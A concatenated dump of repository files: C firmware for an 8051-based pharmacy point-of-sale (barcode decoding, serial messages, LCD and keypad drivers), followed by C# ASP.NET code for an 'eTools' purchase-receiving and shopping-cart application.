Programa em C de um Microcontrolador 8-bit.
Ponto de venda de uma farmácia com controle de estoque por serial, e emissão de nota.
## Authors
* **<NAME>** - <EMAIL>
<file_sep>#include <stdio.h>
int all_widths[]={212222,222122,222221,121223,121322,131222,122213,122312,132212,221213,221312,231212,112232,122132,122231,113222,123122,123221,223211,221132,221231,213212,223112,312131,311222,321122,321221,312212,322112,322211,212123,212321,232121,111323,131123,131321,112313,132113,132311,211313,231113,231311,112133,112331,132131,113123,113321,133121,313121,211331,231131,213113,213311,213131,311123,311321,331121,312113,312311,332111,314111,221411,431111,111224,111422,121124,121421,141122,141221,112214,112412,122114,122411,142112,142211,241211,221114,413111,241112,134111,111242,121142,121241,114212,124112,124211,411212,421112,421211,212141,214121,412121,111143,111341,131141,114113,114311,411113,411311,113141,114131,311141,411131,211412,211214,211232,233111};
//char serial_in[] = {'S','T',2,0xb2,0x00};
//69 = 10110010000
// 10110010 | 000(0 0000)
// B2|00 = 178; 0
//char serial_in[] = {'S','T',3,0xb2,0x16,0x40};
//69;69 = 10110010 00010110 010000(00)
//69;69 = B2 16 40
//34,51,45,42 = 10001011000 | 11011101000 | 10111011000 |10110111000
// 10001011 00011011 10100010 11101100 01011011 1000(0000)
//34 51 45 42 = 8B 1B A2 EC 5B 80
//char serial_in[] = {'S','T',6,0x8b,0x1b,0xa2,0xec,0x5b,0x80};
void serial2pattern(unsigned char * serial_in, unsigned char *patt){
//ex:
//serial_in[] = {'S','T',2,0xb2,0x00};
//patt = output buffer array
//patt = {1,0,1,1,0,0,1,0,0,0,0}; get 11*msg digits pattern from num_bytes bytes
int num_bytes = serial_in[2];
int num_messages = num_bytes*8/11;
int current_byte;
int resto;
for(int msg=0;msg<num_messages;msg++){
for(int j=0;j<11;j++){
current_byte = (j+msg*11)/8;
resto = (j+msg*11) - current_byte*8;
//printf("%d %d \n",current_byte,resto);
patt[j+msg*11] = (serial_in[current_byte+3]>>(7-resto))&1;
}
}
}
int pattern2widths(unsigned char *pattern){
/*
Padroes sao compostos de 3 linhas e 3 colunas.
Podendo Ocupar 1,2,3,4 espacos cada linha / coluna.
A soma das larguras deve ser 11
Essa funcao transforma um array do pattern em larguras
ex: 11001100110 -> 22221
pattern[0] e sempre 1
pattern[11] eh sempre 0
*/
int larguras = 1;
for(int i=1;i<11;i++){
if(pattern[i]==pattern[i-1]){
larguras++;
}else{
larguras = larguras*10;
larguras++;
}
}
return larguras;
}
int widths2value(int larguras){
//recebe as larguras e confronta com all_widths
for(int i=0;i<107;i++){
if(larguras==all_widths[i]){
return i;
}
}
return -1;
}
void main(){
//unsigned char serial_in[] = {'S','T', 2, 0xb2, 0};
//unsigned char serial_in[] = {'S','T',3,0xb2,0x16,0x40};
unsigned char serial_in[] = {'S','T',6,0x8b,0x1b,0xa2,0xec,0x5b,0x80};
unsigned char pat2[500];
unsigned char message[11];
int lar;
int val;
int num_bytes = serial_in[2];
int num_msg = 8*num_bytes/11;
serial2pattern(serial_in,pat2);
//for(int i=0;i<num_msg*11;i++) printf("%i",pat2[i]);
//printf("\n");
for(int msg=0;msg<num_msg;msg++){
for(int j=0;j<11;j++){
message[j] = pat2[j+msg*11];
}
lar = pattern2widths(message);
val = widths2value(lar);
//for(int i=0;i<11;i++) printf("%i",message[i]);
//printf("\nLarguras: %d \n",lar);
printf("Valor: %d \n",val);
}
}
<file_sep>//Pharmicros
//<NAME> 243876, <NAME> 243875
//Comunicacao serial - protocolo de envio
#include <reg51.h>
static void enviar_dado( char dado );
static void enviar_palavra( char *palavra );
void msg_travar_terminal()
{
enviar_palavra("PT");
}
void msg_liberar_terminal()
{
enviar_palavra("PL");
}
void msg_recebimento_horario()
{
enviar_palavra("PH");
}
void msg_entrada_operador( char *operador, char *senha )
{
char n =14;
enviar_palavra("PO");
enviar_dado(n);
enviar_palavra(operador);
enviar_palavra(senha);
}
void msg_vendas_aberta()
{
enviar_palavra("PA");
}
void msg_consulta_produto( char *produto )
{
char n =7;
enviar_palavra("PP");
enviar_dado(n);
enviar_palavra(produto);
}
void msg_confirmacao_compra( char *confirmar )
{
char n =2;
enviar_palavra("PC");
enviar_dado(n);
enviar_palavra(confirmar);
}
void msg_venda_fechada()
{
enviar_palavra("PF");
}
void msg_fechar_sessao()
{
enviar_palavra("PX");
}
void msg_print_comprovante( char *n, char *imprimir) //pensar
{
enviar_palavra("PI");
enviar_palavra(n); //enviar em 2 bytes ??
enviar_palavra(imprimir);
}
void msg_codigo_barra()
{
enviar_palavra("PB");
}
<file_sep>//Pharmicros
//<NAME> 243876, <NAME> 243875
//Função de escrever no display
#include <reg51.h>
sbit RS = P3^6;
sbit E = P3^7;
void atraso_timer0_40us()
{
TMOD = 0x1; // timer 16 bits
TF0 = 0; // flag = 0
TH0 = 0xFF; // timer 74 periodos = 0x4A; FFFF-4A = FFB5
TL0 = 0xB5;
TR0 = 1; // start
while( TF0 == 0 );
TR0 = 0;
}
void atraso_timer0_1u65s()
{
int i;
for( i=0; i<40; i++ )
{
atraso_timer0_40us();
}
}
void escrita_comando_lcd( char comando )
{
RS = 0;
E = 1;
P1 = comando;
E = 0;
atraso_timer0_40us();
}
void escrita_dado_lcd( char dado )
{
RS = 1;
E = 1;
P1 = dado;
E = 0;
atraso_timer0_40us();
}
void init_lcd()
{
escrita_comando_lcd(0x38); //00111000 F=0, N=1, DL=1 barramento de 8 bits...
escrita_comando_lcd(0x0C); //00001100 D=1, C=0, B=0 display ativo...
escrita_comando_lcd(0x06); //00000110 I/D=1, S=0 mensagem fixa...
escrita_comando_lcd(0x01); //00000001 apagar display
atraso_timer0_1u65s();
}
void print_lcd( char *mensagem )
{
char i = 0;
while ( mensagem[i] != 0 )
{
escrita_dado_lcd(mensagem[i]);
i++;
}
}
void cursor_lcd( char linha, char coluna )
{
if ( linha == 0)
{
escrita_comando_lcd(0x80);
while ( coluna != 0)
{
escrita_comando_lcd(0x14); //shift cursor to the right
coluna--;
}
}
else
{
escrita_comando_lcd(0xC0); //comando de pular linha
while ( coluna != 0)
{
escrita_comando_lcd(0x14); //shift cursor to the right
coluna--;
}
}
}
//void main()
//{
// init_lcd();
// cursor_lcd(0, 3);
// print_lcd("Pharmicros");
// cursor_lcd(1, 2);
// print_lcd("Eh us guris");
// while(1);
//}
<file_sep>// Turma A - Projeto pharmicross
//<NAME> (243876)
//<NAME> (243875)
//Essa funcao ler o botao pressionado
//#include <reg51.h>
#include <stdio.h>
sfr porta3 = 0xB0;
sbit LED = porta3^5;
sfr porta0 = 0x80;
char bounce = 8;
char key_pressed;
unsigned char keypad[4][3] = {{'1','2','3'},
{'4','5','6'},
{'7','8','9'},
{'*','0','#'}};
void delay(){
unsigned short a;
for(a=0;a<100;a++);
}
char debounce(char linha, char coluna){
char count = 0;
char key_last = 0;
char key_now;
char key_valid;
porta0 = ~(1<<(7-linha));
while(count != bounce){
delay();
key_now = porta0 & (1<<coluna);
if(key_now == key_last){
count++;
}
else{
count = 0;
}
key_last = key_now;
}
key_valid = key_now;
return key_valid;
}
char key_detect(){
unsigned char linha = 0;
unsigned char coluna = 0;
for(linha=0;linha<4;linha++){
for(coluna=0;coluna<3;coluna++){
if(!debounce(linha,coluna)){
while(!debounce(linha,coluna));
return keypad[linha][coluna];
}
}
}
return 0;
}
/*
void main(){
while(1){
key_pressed = key_detect();
if(key_pressed=='6'||key_pressed=='5'){
LED = !LED;
}
}
}*/
| f18c2f29a946b9631003e66765ab27a35c7bfa74 | [
"Markdown",
"C"
] | 9 | C | juliomilani/pharmicros | 120cb585cec5f0038fedf3318dcd126bd9db44fb | 4f04f6c27e50af32077af2a0936e9890266490d4 |
refs/heads/main | <file_sep>namespace eTools.Data.Entities.Pocos
{
/// <summary>
/// Flat projection used when building/displaying a purchase order line:
/// pairs an item's current stock numbers with the quantity and price
/// proposed for ordering.
/// </summary>
public class PurchaseOrdersList
{
// Key of the stock item this row refers to.
public int StockItemID { get; set; }
// Display description of the stock item.
public string Description { get; set; }
// Units currently on hand.
public int QuantityOnHand { get; set; }
// Threshold at which the item should be re-ordered.
public int ReOrderLevel { get; set; }
// Units already outstanding on purchase orders.
public int QuantityOnOrder { get; set; }
// Quantity proposed for the purchase order being built.
public int PurchaseOrderQuantity { get; set; }
// Unit price for the order. NOTE(review): "PPrice" presumably means
// purchase (vendor) price — confirm against the UI that binds this POCO.
public decimal PPrice { get; set; }
}
}
<file_sep>using eTools.Application.BLL;
using eTools.Data.Entities;
using eTools.Data.Entities.Pocos;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
public partial class Tasks_Staff : System.Web.UI.Page
{
/// <summary>
/// Gates the receiving page: anonymous visitors are sent to login, and only
/// members of the Employees role may see the outstanding-orders panel.
/// </summary>
protected void Page_Load(object sender, EventArgs e)
{
    // Guard: unauthenticated requests go straight to the login page.
    if (!Request.IsAuthenticated)
    {
        Response.Redirect("~/Account/Login.aspx");
        return;
    }
    // Employees get the receiving panel; everyone else gets an explanation.
    if (User.IsInRole("Employees"))
    {
        OutstandingOrders.Visible = true;
        return;
    }
    MessageUserControl.ShowInfo("You must be logged into an employee account to access this page.");
    OutstandingOrders.Visible = false;
}
/// <summary>
/// ObjectDataSource status callback: routes any exception raised during data
/// binding to the shared MessageUserControl instead of letting the page crash.
/// </summary>
protected void CheckForException(object sender, ObjectDataSourceStatusEventArgs e)
{
MessageUserControl.HandleDataBoundException(e);
}
/// <summary>
/// When a purchase order row is selected, reveals the order panels, copies the
/// header fields (PO number, vendor, phone) from the grid row, and loads the
/// order's detail lines into the receiving grid.
/// </summary>
protected void ShowPurchaseOrders_SelectedIndexChanging(object sender, GridViewSelectEventArgs e)
{
OrderInfo.Visible = true;
OrderControls.Visible = true;
int index = e.NewSelectedIndex;
GridViewRow agrow = ShowPurchaseOrders.Rows[index];
// NOTE(review): cells are addressed positionally — column 0 is assumed to be
// the PO number, column 2 the vendor name, column 3 the phone number.
// Confirm against the GridView column layout in the .aspx markup.
int orderNumber = int.Parse(agrow.Cells[0].Text);
PONum.Text = agrow.Cells[0].Text;
Vendor.Text = agrow.Cells[2].Text;
Phone.Text = agrow.Cells[3].Text;
// Any lookup failure is surfaced through the shared message control.
MessageUserControl.TryRun(() =>
{
ReceivingController sysmgr = new ReceivingController();
List<ViewPurchaseOrderItems> orderInfo = sysmgr.GetPurchaseOrderDetails(orderNumber);
ShowOrderDetails.DataSource = orderInfo;
ShowOrderDetails.DataBind();
});
}
/// <summary>
/// Validates the receiving grid and records the receipt of the selected
/// purchase order. Each grid row contributes received/returned quantities;
/// a returned quantity requires a reason. The order is considered complete
/// (and closed) only when every line's received amount covers its
/// outstanding amount.
/// </summary>
protected void ReceiveOrder_Click(object sender, EventArgs e)
{
if (PONum.Text != "")
{
bool orderCompleted = true;
int orderNumber = int.Parse(PONum.Text);
ViewPurchaseOrderItems orderItem = null;
List<ViewPurchaseOrderItems> orderDetails = new List<ViewPurchaseOrderItems>();
// All validation happens inside TryRun so a thrown Exception becomes a
// user-visible message instead of a page error.
MessageUserControl.TryRun(() =>
{
int tempInt = 0;
// count tracks the grand total of received + returned units; a zero total
// means the user submitted an empty receive, which is rejected below.
int count = 0;
foreach (GridViewRow arow in ShowOrderDetails.Rows)
{
// Rebuild one detail line from the templated controls in this grid row.
orderItem = new ViewPurchaseOrderItems();
orderItem.ItemID = int.Parse((arow.FindControl("StockNum") as Label).Text);
orderItem.ItemDescription = (arow.FindControl("Description") as Label).Text;
orderItem.Ordered = int.Parse((arow.FindControl("QtyOrdered") as Label).Text);
// Returned quantity: blank means 0; otherwise it must parse to a
// non-negative integer.
if (string.IsNullOrEmpty((arow.FindControl("QtyReturned") as TextBox).Text))
{
orderItem.Returned = 0;
}
else
{
if (int.TryParse((arow.FindControl("QtyReturned") as TextBox).Text, out tempInt))
{
if (tempInt >= 0)
{
orderItem.Returned = tempInt;
count += tempInt;
}
else
{
throw new Exception("You must enter a postive integer value for returned items.");
}
}
else
{
throw new Exception("You must enter an integer value for returned items.");
}
}
// Received quantity: same rules as returned.
if (string.IsNullOrEmpty((arow.FindControl("QtyReceived") as TextBox).Text))
{
orderItem.Received = 0;
}
else
{
if (int.TryParse((arow.FindControl("QtyReceived") as TextBox).Text, out tempInt))
{
if (tempInt >= 0)
{
orderItem.Received = tempInt;
count += tempInt;
}
else
{
throw new Exception("You must enter a postive integer value for received items.");
}
}
else
{
throw new Exception("You must enter an integer value for received items.");
}
}
// Returns must be justified; the reason is only captured when something
// was actually returned.
if ((arow.FindControl("ReasonReturned") as TextBox).Text == "" && orderItem.Returned > 0)
{
throw new Exception("You must enter a reason for returned items.");
}
else
{
if (orderItem.Returned > 0)
{
orderItem.Reason = (arow.FindControl("ReasonReturned") as TextBox).Text;
}
}
// Any line still short of its outstanding amount keeps the order open.
if (orderItem.Received < int.Parse((arow.FindControl("QtyOutstanding") as Label).Text))
{
orderCompleted = false;
}
orderDetails.Add(orderItem);
}
if (count == 0)
{
throw new Exception("You cannot receive an empty order.");
}
ReceivingController sysmgr = new ReceivingController();
sysmgr.ReceivePurchaseOrder(orderNumber, orderDetails, orderCompleted);
// Success: clear the selection panel and refresh both grids.
PONum.Text = "";
Vendor.Text = "";
Phone.Text = "";
ShowOrderDetails.DataSource = null;
ShowOrderDetails.DataBind();
ShowPurchaseOrders.DataBind();
OrderInfo.Visible = false;
OrderControls.Visible = false;
}, "Purchase Order Receiving", "Purchase Order successfully received.");
}
else
{
MessageUserControl.ShowInfo("You must select a purchase order before receiving.");
}
}
/// <summary>
/// Force-closes the selected purchase order. A purchase order must be
/// selected and a reason supplied; on success the selection panel is cleared
/// and both grids are refreshed.
/// </summary>
protected void ForceClose_Click(object sender, EventArgs e)
{
    // Guard: nothing to close until a purchase order has been selected.
    if (PONum.Text == "")
    {
        MessageUserControl.ShowInfo("You must select a purchase order before closing.");
        return;
    }
    int purchaseOrderNumber = int.Parse(PONum.Text);
    string closeReason = ReasonForceClosed.Text;
    MessageUserControl.TryRun(() =>
    {
        // Business rule: a forced close always needs an explanation.
        if (closeReason == "")
        {
            throw new Exception("You must enter a reason for force closing.");
        }
        ReceivingController controller = new ReceivingController();
        controller.ForceClosePurchaseOrder(purchaseOrderNumber, closeReason);
        // Reset the selection details and rebind the grids.
        PONum.Text = "";
        Vendor.Text = "";
        Phone.Text = "";
        ReasonForceClosed.Text = "";
        ShowOrderDetails.DataSource = null;
        ShowOrderDetails.DataBind();
        ShowPurchaseOrders.DataBind();
        OrderInfo.Visible = false;
        OrderControls.Visible = false;
    }, "Purchase Order Receiving", "Purchase Order successfully closed.");
}
}<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using eTools.Application.BLL;
using Microsoft.AspNet.Identity;
using eTools.Data.Entities;
using eTools.Data;
using System.Data;
public partial class Tasks_Default : System.Web.UI.Page
{
// Intentionally empty: this page needs no code-behind initialization; its
// content is declared entirely in the markup.
protected void Page_Load(object sender, EventArgs e)
{
}
}<file_sep>using Microsoft.AspNet.Identity.EntityFramework;
namespace eTools.Application.Security
{
/// <summary>
/// Site-specific identity user: extends ASP.NET IdentityUser with optional
/// links back to the application's own employee/customer records.
/// </summary>
public class ApplicationUser : IdentityUser
{
// Key of the linked employee record; null for non-employee accounts.
public int? EmployeeId { get; set; }
// Identifier of the linked customer record; null when the account is not a
// customer. NOTE(review): stored as string — confirm it matches the
// customer table's key type.
public string CustomerId { get; set; }
}
}
<file_sep>namespace eTools.Data.Entities.Pocos
{
/// <summary>
/// One line of a purchase order as shown on the receiving screen: what was
/// ordered and is still outstanding, plus the quantities the user is
/// receiving/returning right now.
/// </summary>
public class ViewPurchaseOrderItems
{
// Stock item key for this line.
public int ItemID { get; set; }
// Display description of the stock item.
public string ItemDescription { get; set; }
// Quantity originally ordered.
public int Ordered { get; set; }
// Quantity not yet received.
public int Outstanding { get; set; }
// Quantity being received in the current transaction.
public int Received { get; set; }
// Quantity being returned in the current transaction.
public int Returned { get; set; }
// Reason for the return; only meaningful when Returned > 0.
public string Reason { get; set; }
}
}
<file_sep>namespace eTools.Data.Entities.Pocos
{
/// <summary>
/// Minimal vendor projection (id + name) for lookup lists.
/// </summary>
public class VendorList
{
// Vendor primary key.
public int VendorID { get; set; }
// Vendor display name.
public string VendorName { get; set; }
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace eTools.Data.Entities.Pocos
{
/// <summary>
/// Minimal employee projection (id + name) for lookup lists.
/// </summary>
public class EmployeeList
{
// Employee primary key.
public int EmployeeID { get; set; }
// Employee display name.
public string EmployeeName { get; set; }
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace eTools.Application.Security
{
/// <summary>
/// Central catalogue of the security role names used by the web site.
/// </summary>
internal static class SecurityRoles
{
    // Role name literals; these must match the role names stored by Identity.
    public const string WebsiteAdmins = "WebsiteAdmins";
    public const string Customers = "Customers";
    public const string Employees = "Employees";
    /// <summary>
    /// Roles that should exist when the application starts up.
    /// A fresh list is created on every access, in declaration order.
    /// </summary>
    public static List<string> StartupSecurityRoles
    {
        get
        {
            return new List<string>
            {
                WebsiteAdmins,
                Customers,
                Employees
            };
        }
    }
}
}
<file_sep>using eTools.Data.Entities.Pocos;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using eTools.Data.DAL;
using eTools.Data.Entities;
using System.ComponentModel;
using System.Security.Principal;
namespace eTools.Application.BLL
{
[DataObject]
public class SalesController
{
/// <summary>
/// Lists every category with the number of stock items it contains; bound to
/// the category picker by an ObjectDataSource.
/// </summary>
[DataObjectMethod(DataObjectMethodType.Select, false)]
public List<CategoryList> GetCategoryList()
{
    using (var context = new eToolsContext())
    {
        return context.Categories
            .Select(category => new CategoryList()
            {
                CategoryID = category.CategoryID,
                CategoryDescription = category.Description,
                ItemCount = category.StockItems.Count()
            })
            .ToList();
    }
}
/// <summary>
/// Returns the stock items for one category, or all stock items when no
/// category filter is supplied.
/// </summary>
/// <param name="categoryid">Category key to filter by; null or 0 means "all categories".</param>
[DataObjectMethod(DataObjectMethodType.Select, false)]
public List<StockItem> GetStockItemList(int? categoryid)
{
    using (var context = new eToolsContext())
    {
        var data = from item in context.StockItems
                   select item;
        // BUG FIX: the previous test was `categoryid != 0`, which is also true
        // when categoryid is null; the query then filtered on
        // CategoryID == null and returned nothing. A null category now falls
        // through to the unfiltered query, same as 0.
        if (categoryid.HasValue && categoryid.Value != 0)
        {
            data = from item in context.StockItems
                   where item.CategoryID == categoryid
                   select item;
        }
        return data.ToList();
    }
}
/// <summary>
/// Despite its name, this returns the NUMBER of OnlineCustomer rows matching
/// the user name (effectively 0 or 1), not the customer id — callers use it
/// as an existence check. NOTE(review): the name is misleading; consider a
/// rename once all call sites are confirmed.
/// </summary>
public int GetOnlineCustomerIDByUserName(string username)
{
using (var context = new eToolsContext())
{
int result = (from customer in context.OnlineCustomers
where customer.UserName == username
select customer.OnlineCustomerID).Count();
return result;
}
}
/// <summary>
/// Returns the NUMBER of shopping carts owned by the given user name, not a
/// cart itself — callers use it to decide whether a cart must be created.
/// NOTE(review): the name suggests it returns a cart; it returns a count.
/// </summary>
public int GetShoppingCartByUserName(string username)
{
using (var context = new eToolsContext())
{
int result = (from customer in context.ShoppingCarts
where customer.OnlineCustomer.UserName == username
select customer.ShoppingCartID).Count();
return result;
}
}
/// <summary>
/// Returns the id of the user's shopping cart, or 0 when the user has none.
/// </summary>
public int GetShoppingCartID(string username)
{
    using (var context = new eToolsContext())
    {
        return context.ShoppingCarts
            .Where(cart => cart.OnlineCustomer.UserName == username)
            .Select(cart => cart.ShoppingCartID)
            .FirstOrDefault();
    }
}
/// <summary>
/// Returns the id of the first item in the customer's first shopping cart;
/// 0 when the customer has no cart or the cart is empty.
/// </summary>
public int GetShoppingCartItemID(int onlineCustomerID)
{
    using (var context = new eToolsContext())
    {
        // Step 1: the customer's (first) cart id — 0 when no cart exists.
        int cartId = context.ShoppingCarts
            .Where(cart => cart.OnlineCustomerID == onlineCustomerID)
            .Select(cart => cart.ShoppingCartID)
            .FirstOrDefault();
        // Step 2: the first item in that cart — 0 when the cart is empty.
        return context.ShoppingCartItems
            .Where(cartItem => cartItem.ShoppingCartID == cartId)
            .Select(cartItem => cartItem.ShoppingCartItemID)
            .FirstOrDefault();
    }
}
/// <summary>
/// Returns the OnlineCustomerID for the given user name.
/// Throws (InvalidOperationException from First) when no such customer exists.
/// </summary>
public int FindCustomerID(string username)
{
    using (var context = new eToolsContext())
    {
        return context.OnlineCustomers
            .Where(customer => customer.UserName == username)
            .Select(customer => customer.OnlineCustomerID)
            .First();
    }
}
/// <summary>
/// Persists a new online customer and returns its database-generated id.
/// </summary>
public int AddOnlineCustomer(OnlineCustomer item)
{
    using (var context = new eToolsContext())
    {
        OnlineCustomer newCustomer = context.OnlineCustomers.Add(item);
        context.SaveChanges();
        // SaveChanges populates the identity key on the tracked entity.
        return newCustomer.OnlineCustomerID;
    }
}
/// <summary>
/// Persists a new shopping cart for a customer.
/// </summary>
public void AddShoppingCart(ShoppingCart item2)
{
    using (var context = new eToolsContext())
    {
        // FIX: the Add result was previously captured in an unused local;
        // the method is void, so the returned entity is not needed.
        context.ShoppingCarts.Add(item2);
        context.SaveChanges();
    }
}
/// <summary>
/// Adds a stock item to the user's shopping cart as a new cart line.
/// (Merging quantities into an existing line is handled by
/// UpdateToShoppingCart.)
/// </summary>
/// <param name="stockitemid">Stock item being added.</param>
/// <param name="username">Owner of the cart.</param>
/// <param name="quantity">Units to add.</param>
public void AddToShoppingCart(int stockitemid, string username, int quantity)
{
    using (var context = new eToolsContext())
    {
        // FIX: the original built three chained anonymous-type queries, one
        // of which (the existing-quantity lookup) was dead code that was
        // never enumerated. A single query resolving the id of the user's
        // first cart is equivalent.
        int cartId = (from cart in context.ShoppingCarts
                      where cart.OnlineCustomer.UserName == username
                      select cart.ShoppingCartID).FirstOrDefault();
        ShoppingCartItem item = new ShoppingCartItem();
        item.ShoppingCartID = cartId;
        item.StockItemID = stockitemid;
        item.Quantity = quantity;
        context.ShoppingCartItems.Add(item);
        context.SaveChanges();
    }
}
/// <summary>
/// Adds <paramref name="quantity"/> units to the user's existing cart line
/// for the given stock item by re-saving the line with the combined quantity.
/// Throws (from First) when the user has no cart items or no line for the
/// stock item.
/// NOTE(review): the cart id is taken from the user's first cart item of ANY
/// stock item — confirm this is correct when a user could own more than one
/// cart.
/// </summary>
public void UpdateToShoppingCart(int stockitemid, int shoppingcartitemid, string username, int quantity)
{
using (var context = new eToolsContext())
{
int result = (from cart in context.ShoppingCartItems
where cart.ShoppingCart.OnlineCustomer.UserName == username
select cart.ShoppingCartID).First();
int result2 = (from cart in context.ShoppingCartItems
where cart.ShoppingCart.OnlineCustomer.UserName == username && cart.StockItemID == stockitemid
select cart.Quantity).First();
// A detached stand-in entity is built with the combined quantity, then
// attached and flagged Modified so every mapped column is rewritten.
ShoppingCartItem item = new ShoppingCartItem();
item.ShoppingCartItemID = shoppingcartitemid;
item.StockItemID = stockitemid;
item.Quantity = quantity + result2;
item.ShoppingCartID = result;
context.Entry<ShoppingCartItem>(context.ShoppingCartItems.Attach(item)).State =
System.Data.Entity.EntityState.Modified;
context.SaveChanges();
}
}
/// <summary>
/// Returns the display rows (item, price, quantity, line total) for the
/// given user's cart.
/// NOTE(review): result/result2 are dereferenced without null checks — a
/// user name with no customer record or no cart will raise a
/// NullReferenceException; confirm callers only invoke this for users with
/// carts.
/// </summary>
public List<ShoppingCartItemList> GetShoppingCartItems(string userName)
{
using (var context = new eToolsContext())
{
// Customer -> first cart -> projected cart lines.
var result = (from item in context.OnlineCustomers
where item.UserName == userName
select item).FirstOrDefault();
var result2 = (from x in context.ShoppingCarts
where x.OnlineCustomerID == result.OnlineCustomerID
select x).FirstOrDefault();
var result3 = from y in context.ShoppingCartItems
where y.ShoppingCartID == result2.ShoppingCartID
select new ShoppingCartItemList()
{
Quantity = y.Quantity,
StockItemID = y.StockItemID,
Description = y.StockItem.Description,
SellingPrice = y.StockItem.SellingPrice,
ItemTotal = y.Quantity * y.StockItem.SellingPrice,
ShoppingCartItemID = y.ShoppingCartItemID
};
return result3.ToList();
}
}
/// <summary>
/// Removes one line from a shopping cart.
/// </summary>
/// <returns>Number of rows affected, as reported by SaveChanges.</returns>
public int DeleteShoppingCartItem(int ShoppingCartItemID)
{
    using (var context = new eToolsContext())
    {
        ShoppingCartItem cartItem = context.ShoppingCartItems.Find(ShoppingCartItemID);
        // FIX: Find returns null for an unknown id, and Remove(null) used to
        // throw an unhelpful ArgumentNullException. Report the problem in a
        // message the MessageUserControl can show.
        if (cartItem == null)
        {
            throw new Exception("Shopping cart item no longer exists.");
        }
        context.ShoppingCartItems.Remove(cartItem);
        return context.SaveChanges();
    }
}
/// <summary>
/// Sets the quantity of one shopping cart line.
/// </summary>
/// <returns>Number of rows affected, as reported by SaveChanges.</returns>
public int UpdateShoppingCartItem(int ShoppingCartItemID, int quantity)
{
    using (var context = new eToolsContext())
    {
        ShoppingCartItem cartItem = context.ShoppingCartItems.Find(ShoppingCartItemID);
        // FIX: Find returns null for an unknown id; dereferencing it used to
        // throw a NullReferenceException. Fail with a clear message instead.
        if (cartItem == null)
        {
            throw new Exception("Shopping cart item no longer exists.");
        }
        cartItem.Quantity = quantity;
        // FIX: the entity returned by Find is already tracked, so re-attaching
        // it was redundant; marking it Modified is sufficient.
        context.Entry(cartItem).State = System.Data.Entity.EntityState.Modified;
        return context.SaveChanges();
    }
}
/// <summary>
/// Computes the subtotal (sum of quantity * selling price over every line)
/// for the given shopping cart; 0 for an empty or unknown cart.
/// </summary>
public decimal GetSubTotal(int ShoppingCartID)
{
    using (var context = new eToolsContext())
    {
        // FIX: replaces a manual accumulation loop (with a misspelled local)
        // by Sum over the materialized line totals; an empty list sums to 0.
        var lineTotals = (from a in context.ShoppingCartItems
                          where a.ShoppingCartID == ShoppingCartID
                          select a.Quantity * a.StockItem.SellingPrice).ToList();
        return lineTotals.Sum();
    }
}
/// <summary>
/// Looks up the discount value for a coupon code;
/// returns 0 when the code is not on file.
/// </summary>
public int GetCoupons(string value)
{
    using (var context = new eToolsContext())
    {
        return context.Coupons
            .Where(coupon => coupon.CouponIDValue == value)
            .Select(coupon => coupon.CouponDiscount)
            .FirstOrDefault();
    }
}
}
}
<file_sep>using Microsoft.AspNet.Identity;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using eTools.Application.BLL;
using eTools.Data.Entities.Pocos;
public partial class Tasks_ViewCart : System.Web.UI.Page
{
/// <summary>
/// Populates the cart view on the first request only; postbacks rebind
/// explicitly after each command. Visitors with no user name (anonymous)
/// get no cart data.
/// </summary>
protected void Page_Load(object sender, EventArgs e)
{
    // FIX: removed an empty, dead else-branch and moved the user-name lookup
    // inside the first-request check where it is actually used.
    if (!IsPostBack)
    {
        string username = User.Identity.GetUserName();
        if (!string.IsNullOrEmpty(username))
        {
            ShoppingCartItemData();
        }
    }
}
/// <summary>
/// Rebinds the cart repeater for the signed-in user and refreshes the
/// displayed subtotal.
/// </summary>
public void ShoppingCartItemData()
{
    string currentUser = User.Identity.GetUserName();
    SalesController salesManager = new SalesController();
    // Bind the user's cart lines to the repeater.
    List<ShoppingCartItemList> cartLines = salesManager.GetShoppingCartItems(currentUser);
    CartItemReapter.DataSource = cartLines;
    CartItemReapter.DataBind();
    // Recompute and display the cart subtotal.
    int cartId = salesManager.GetShoppingCartID(currentUser);
    decimal cartSubTotal = salesManager.GetSubTotal(cartId);
    SubTotal.Text = cartSubTotal.ToString();
}
/// <summary>
/// Handles the Remove/Update buttons on each cart row. The command argument
/// carries the ShoppingCartItemID for the row.
/// </summary>
protected void CartItemReapter_ItemCommand(object source, RepeaterCommandEventArgs e)
{
    int shoppingCartItemId = Convert.ToInt32(e.CommandArgument.ToString());
    SalesController saleManager = new SalesController();
    if (e.CommandName == "Remove")
    {
        MessageUserControl.TryRun(() =>
        {
            saleManager.DeleteShoppingCartItem(shoppingCartItemId);
            ShoppingCartItemData();
        }, "Success", "Shopping cart item was deleted.");
    }
    else if (e.CommandName == "Update")
    {
        // FIX: the quantity was previously parsed with Convert.ToInt32 before
        // the command check and outside TryRun, so a blank or non-numeric
        // quantity crashed the page — even on Remove, where it is unused.
        // It is now parsed only for Update, inside TryRun, with a friendly
        // validation message.
        TextBox quantityBox = e.Item.FindControl("QuanityChange") as TextBox;
        MessageUserControl.TryRun(() =>
        {
            int newQuantity;
            if (!int.TryParse(quantityBox.Text, out newQuantity))
            {
                throw new Exception("Quantity must be a whole number.");
            }
            saleManager.UpdateShoppingCartItem(shoppingCartItemId, newQuantity);
            ShoppingCartItemData();
        }, "Success", "Shopping cart item was Updated.");
    }
}
}<file_sep>using eTools.Data.Entities.Pocos;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace eTools.Data.Entities.Pocos
{
/// <summary>
/// Header/summary projection for a purchase order: vendor contact details
/// plus the order's money totals.
/// </summary>
public class PurchaseOrderStats
{
// Key of the order (or vendor) this summary belongs to. NOTE(review):
// confirm whether ID is the purchase order id or the vendor id at the
// call sites that populate it.
public int ID { get; set; }
// Vendor display name.
public string Name { get; set; }
// Vendor location/address text.
public string Location { get; set; }
// Vendor contact phone number.
public string Phone { get; set; }
// Order subtotal before tax.
public decimal Subtotal { get; set; }
// Goods and services tax amount.
public decimal GST { get; set; }
// Grand total (subtotal plus tax).
public decimal Total { get; set; }
}
<file_sep>using Microsoft.AspNet.Identity.EntityFramework;
